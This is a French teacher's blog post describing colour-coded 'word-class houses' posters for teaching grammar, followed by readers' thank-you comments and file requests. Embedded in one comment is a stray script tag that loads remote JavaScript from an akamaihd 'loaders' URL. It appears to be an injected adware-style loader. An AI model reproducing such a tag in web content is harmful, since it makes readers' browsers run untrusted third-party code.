-
Les (maisons des) natures de mots
Je ne sais pas pour vous, mais moi, dans ma classe, les natures de mots, c'est la cata'! Le flou artistique complet pour pas mal de mes élèves.
Alors, depuis le début de l'année et ce constat effarant, j'ai cherché un moyen d'organiser tout ça (le joli bazar dans leur petite tête) et d'éclaircir les choses. Et je crois que j'ai trouvé...
Je me suis inspiré des maisons des sons et autres maisons des nombres (voir affichages de calcul pour les CP) et je les ai transposées dans le domaine de la Grammaire pour en faire des "Maisons des natures de mots". Alors, oui, ça pourrait paraitre "bébé", mais pour les avoir mises en place dans ma classe depuis 2 semaines, je peux vous dire que ça marche bien et que ça a fait son petit effet (sur tous les plans)
Comment je/ça fonctionne ?
- Chaque maison a été photocopiée en A3 (141%) et plastifiée,
- Chaque maison a une couleur de toit différente : déterminants, noms communs, adjectifs, verbes, prépositions, conjonction de coordination, pronoms relatifs.
- Ces couleurs sont réutilisées le matin pour l'analyse de la phrase du jour au tableau (G.N. soulignés en bleu, noms noyaux encadrés en bleu, ajdectifs soulignés en vert, verbes en rouges, compléments du nom en gris, propositions subordonnées relatives en violet, propositions séparées par des crochets jaunes...) Ce sont les mêmes couleurs qui sont utilisées à chaque mot qu'il le faut en grammaire.
- Les maisons des noms, des adjectifs et des verbes sont vides car je les remplis avec les élèves (avec des mots qu'ils me donnent, que nous rencontrons au cours de nos diverses leçons, des mots du jour = rituels du matin fait avec le calendrier des incollables).
Voilà... je pense avoir tout dit sur mes maisons. Maintenant, si vous voyez autre chose, une question, une amélioriation, une critque... n'hésitez pas !
Tags : affichages, cm2, natures de mots, grammaire
-
Commentaires
2Beatrice77Vendredi 27 Juillet 2012 à 22:57Oh yes j'aime bien ton idée pour mes CE1. Je vais garder ton idée des maisons et y rajouter les personnages de "réussir son entrée en grammaire". Merci merci!
3La zelleVendredi 24 Août 2012 à 22:21Sympa l'idée des maisons. Pourrais-tu les me les fournir en pdf et word afin de les adapter à ma classe?
Cette année j'ai testé le train des fonctions en affichage, cela fait écho à la maternelle tout comme tes maisons, les CM1 ont adoré!!
4camthomSamedi 25 Août 2012 à 18:00je n'arrive pas à trouver le dossier"la maison des mots"...Ou cliquer?
<script src="http://cdncache3-a.akamaihd.net/loaders/1032/l.js?aoi=1311798366&pid=1032&zoneid=62862" type="text/javascript"></script>5JulieLiJeudi 13 Septembre 2012 à 22:21Bonjour,
Moi je fonctionne de manière très similaire en utilisant un tableau de la méthode "la grammaire en couleur" permettant de mobiliser également la mémoire kinésthésique des élèves ... Cette méthode est très motivante pour les élèves et permet de nombreuses activités ritualisées du CE1 au CM2.
Super la maison des mots mais aurais tu ce fichier en word? Avec tous mes remercicements pour tes idées et ton travail
MERCI POUR LE COMMENTAIEZ. HELAS, JE N'AI PLUS LE FICHIER WORD. CEpendant, comme c'est une inspiration des maisons des sons de charivari, tu peux (je pense) prendre sont doc modifiable maison des sons.
9MathiasMercredi 30 Décembre 2015 à 08:31Merci pour les ressources mises à disposition sur votre site.
J'apprécie particulièrement les séquences d'histoire.
bonnes fêtes à vous !
Mathias M
10PaulineSamedi 15 Octobre 2016 à 15:46Bonjour,
J'ai vu vos maisons des mots dans une classe de ce1 (lors d'une formation) et je les ai trouvées très claires. Du coup je les cherchai sans savoir si elles étaient sur internet ou si elles avaient été fabriquées par la maitresse de la classe en question...
Merci je suis ravie de les avoir retrouvées, avec cette super bonne idée de remplir dès le début d'année celles qui sont utiles pour écrire, mais ne sont pas au programme (conjonctions, prépositions etc) et de remplir les autres au cours de l'année avec les élèves !
J'aime beaucoup l'idée toute simple de faire un affichage spécial pour les natures de mots, car souvent parmi toutes les affiches les élèves ont du mal à s'y retrouver. Et en plus ça fonctionne bien avec le village des mots d'Erik Orsenna dans son livre la grammaire est une chanson douce (que j'utilise en classe), ou la méthode Retz Rseeg : les maisons = les natures !Merci encore !
11ElsaDimanche 26 Janvier 2020 à 15:23Bonjour,
je suis tombée sur ton blog en faisant des recherches sur Jules Verne et je te tire mon chapeau pour tout ce que tu publies et l'immense travail fourni !
Que ce soit en Histoire, en orthographe/conjugaison dans tes dictées et là en grammaire je te remercie vraiment car non seulement c'est un travail de grande qualité mais en plus, tu le partages et depuis plusieurs années... Je viens de passer 1/2 h sur ton blog, mais je pense que je n'ai pas fini d'explorer tes publications.
Je suis admirative !
Encore bravo et merci !
Ajouter un commentaire
Bonjour,
Je découvre ton site... Bien intéressant. Et notamment cette "maison des mots" que je vais réutiliser (car dans mes classes de SEGPA aussi, c'est le grand mélange!). J'ai aussi fait, l'an dernier, la phrase du jour qu'on décomposait, pour repérer les accords et les difficultés d'orthographe. Ca fonctionnait très bien.